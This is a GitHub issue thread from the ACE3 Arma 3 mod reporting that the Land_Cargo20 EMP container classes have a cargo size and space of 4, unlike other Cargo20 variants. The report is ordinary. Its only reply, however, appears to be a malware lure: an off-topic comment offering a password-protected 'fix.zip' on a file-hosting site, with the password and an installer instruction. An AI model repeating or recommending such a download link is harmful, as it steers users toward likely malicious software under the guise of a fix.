### ISSUE TITLE
Inconsistent cargo size and space for both Land_Cargo20_EMP and Training

### ISSUE THREAD

**Issue by STyx2909** [acemod/ACE3#10262]
**Mods (complete and add to the following information):**
- **Arma 3:**2.16.151618 stable 
- **CBA:** `3..17.1 stable 
- **ACE3:** `3.17.1 stable 

**Description:**
Minor issue.
configFile >> "CfgVehicles" >> "Land_Cargo20_EMP_Training_F"
Cargo size 4
Cargo space 4

configFile >> "CfgVehicles" >> "Land_Cargo20_EMP_F"
Cargo size 4
Cargo space 4

Compared to Land_Cargo20... (any other)
configFile >> "CfgVehicles" >> "Land_Cargo20_blue_F"
Cargo size 50
Cargo space 49

**Steps to reproduce:**
Place into Eden Editor.

**Expected behavior:**
Same Cargo Size, at least. Cargo space may vary because of radiation shielding.

**Where did the issue occur?**
Editor.

**Log Files:**
Not relevant.

**Additional context:**
None

**Screenshots:**
None

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
